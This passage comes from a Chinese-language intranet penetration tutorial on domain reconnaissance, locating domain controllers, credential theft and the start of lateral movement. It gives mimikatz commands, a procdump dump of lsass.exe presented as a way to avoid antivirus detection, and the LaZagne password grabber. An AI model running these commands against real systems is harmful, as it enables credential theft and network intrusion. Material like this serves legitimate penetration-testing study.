                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:132.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1064" type="#_x0000_t75" style="width:416pt;height:131.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image031.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="557" height="179" src="https://www.2k8.org/content/uploadfile/202203/17/2a4a2787.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">net group "domain controllers" /domain </span>查看域控<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:3.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net accounts /domain </span>查看域密码策略<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection10;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="548" height="253" src="https://www.2k8.org/content/uploadfile/202203/17/421c600a.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:14.5pt;">&nbsp;</span>
                </p>
                <h3 style="margin-top:1.3pt;punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="3.2 定位域控"></a><span lang="EN-US"><span>3.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>定位域控<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.75pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、通常域内主机<span lang="EN-US">DNS </span>地址就是域控地址<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、查看是否开启<span lang="EN-US"> 53</span>,<span lang="EN-US">389 </span>等端口<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1033" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:19pt;width:412pt;height:333pt;z-index:251665408;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:333.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1065" type="#_x0000_t75" style="width:411.5pt;height:333pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image035.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="552" height="447" src="https://www.2k8.org/content/uploadfile/202203/17/634741e0.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">3</span>、<span lang="EN-US">ping </span>域控计算机名<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection11;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="128" src="https://www.2k8.org/content/uploadfile/202203/17/b72d5d5a.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:4.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="556" height="187" src="https://www.2k8.org/content/uploadfile/202203/17/1ca576ba.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;text-indent:0cm;">
                        <a name="3.2 非域信息收集"></a><span lang="EN-US">3.2 </span>非域信息收集<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、盲扫<span lang="EN-US">C </span>端、<span lang="EN-US">B </span>段等<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、查看<span lang="EN-US">arp </span>表、路由表<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、找配置文件,如数据库配置等<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1034" style="position:absolute;margin-left:90pt;margin-top:7.5pt;width:371pt;height:169pt;z-index:251666432;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:169.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1066" type="#_x0000_t75" style="width:371pt;height:169.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image041.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="497" height="228" src="https://www.2k8.org/content/uploadfile/202203/17/08f70f95.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.5pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:3.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection12;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="365" src="https://www.2k8.org/content/uploadfile/202203/17/b2ace750.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h1 style="line-height:normal;margin-top:8.8pt;punctuation-wrap:simple;">
                        <a name="4、域内横向移动"></a><span lang="EN-US">4</span>、域内横向移动<span lang="EN-US"></span>
                </h1>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:14.5pt;">&nbsp;</span></b>
                </p>
                <h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="4.1 凭据窃取"></a><span lang="EN-US"><span>4.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>凭据窃取<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        窃取凭据来帮助在域内横向移动。抓密码<span lang="EN-US"> hash </span>的工具有很多,例如<span lang="EN-US"> wce</span>、<span lang="EN-US">getpass</span>、<span lang="EN-US">QuarksPwDump_v0.1</span>、<span lang="EN-US">Pwdump7 </span>等等。介绍几个比较好用且自己常用的工具。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;margin-bottom:0cm;margin-left:44.75pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:44.8pt;text-autospace:none;text-indent:-38.8pt;">
                        <a name="4.1.1 mimikatz"></a><b><span lang="EN-US" style="font-size:16.0pt;letter-spacing:-.05pt;"><span>4.1.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span></b><b><span lang="EN-US" style="font-size:16.0pt;">mimikatz</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        用法:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz<span style="letter-spacing:-.05pt;"> # </span>privilege::debug </span><span style="letter-spacing:-.15pt;">(提升权限</span>)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Privilege '20' OK</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:126.7pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz # sekurlsa::logonpasswords </span>(抓取明文密码和<span lang="EN-US"> hash</span>)<span lang="EN-US"> Github </span>地址:<span lang="EN-US"><a href="https://github.com/gentilkiwi/mimikatz"><span style="color:blue;">https://github.com/gentilkiwi/mimikatz</span></a><span style="color:blue;"></span></span>
                </p>
        </div>
<span lang="EN-US" style="color:blue;font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection13;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="552" height="394" src="https://www.2k8.org/content/uploadfile/202203/17/d9fdb887.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.4pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:6.0pt;">&nbsp;</span>
                </p>
                <h2 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.1.2 procdump+mimikatz"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.1.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">procdump+mimikatz</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Procdump </span>是微软官方发布的一款调试工具,因此不会被各种杀毒软件查杀。可使用<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">procdump </span>加<span lang="EN-US"> mimikatz </span>来躲避杀软检测。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        官方下载地址:<span lang="EN-US"><a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump"><span style="color:blue;">https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump</span></a><span style="color:blue;"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、使用<span lang="EN-US">procdump </span>将目标的<span lang="EN-US"> lsass.exe </span>转储成<span lang="EN-US"> dmp </span>文件<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">procdump64.exe -accepteula -ma lsass.exe lsass.dmp</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection14;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="299" src="https://www.2k8.org/content/uploadfile/202203/17/148ffec9.jpg" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、使用<span lang="EN-US"> mimikatz </span>从转储的<span lang="EN-US"> lsass.dmp </span>中来读取明文密码<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1035" style="position:absolute;margin-left:90.5pt;margin-top:15.75pt;width:410pt;height:338pt;z-index:251667456;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:338.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1067" type="#_x0000_t75" style="width:409.5pt;height:338pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image049.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="181" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="549" height="453" src="https://www.2k8.org/content/uploadfile/202203/17/06314630.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:9.0pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:9.0pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection15;">
                <h2 style="margin-top:.7pt;punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.1.3 LaZagne"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.1.3<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">LaZagne</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1036" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:18.65pt;width:415pt;height:461pt;z-index:251668480;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:461.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1068" type="#_x0000_t75" style="width:415pt;height:461.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image051.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="617" src="https://www.2k8.org/content/uploadfile/202203/17/5fbba9aa.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
一款抓密码的神器,可以抓取系统密码、浏览器密码、<span lang="EN-US">wifi </span>密码等等。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection16;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="554" height="482" src="https://www.2k8.org/content/uploadfile/202203/17/130e8c84.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:14.5pt;">&nbsp;</span>
                </p>
                <h3 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="4.2 横向移动"></a><span lang="EN-US"><span>4.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>横向移动<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        横向移动的常用方法和工具。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <h2 style="punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.2.1 IPC+计划任务"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">IPC+</span>计划任务<span lang="EN-US"></span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="letter-spacing:-.15pt;">进程间通信</span><span style="letter-spacing:-.05pt;">(</span><span lang="EN-US" style="letter-spacing:-.1pt;">IP</span><span lang="EN-US" style="letter-spacing:.05pt;">C</span><span style="letter-spacing:-.5pt;">,</span><span lang="EN-US">I<span style="letter-spacing:-.1pt;">n</span>ter<span style="letter-spacing:-.15pt;">-</span><span style="letter-spacing:-.1pt;">P</span>roc<span style="letter-spacing:-.05pt;">e</span><span style="letter-spacing:-.1pt;">s</span>s C<span style="letter-spacing:-.2pt;">o</span><span style="letter-spacing:-.05pt;">m</span><span style="letter-spacing:-.15pt;">m</span><span style="letter-spacing:.05pt;">u</span><span style="letter-spacing:-.1pt;">n</span>i<span style="letter-spacing:-.15pt;">c</span>atio<span style="letter-spacing:-.05pt;">n</span></span><span style="letter-spacing:-5.4pt;">)</span><span style="letter-spacing:-.2pt;">,指至少两个进程或线程间传送数据</span><span style="letter-spacing:-.15pt;">或者信号的一些技术或方法。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
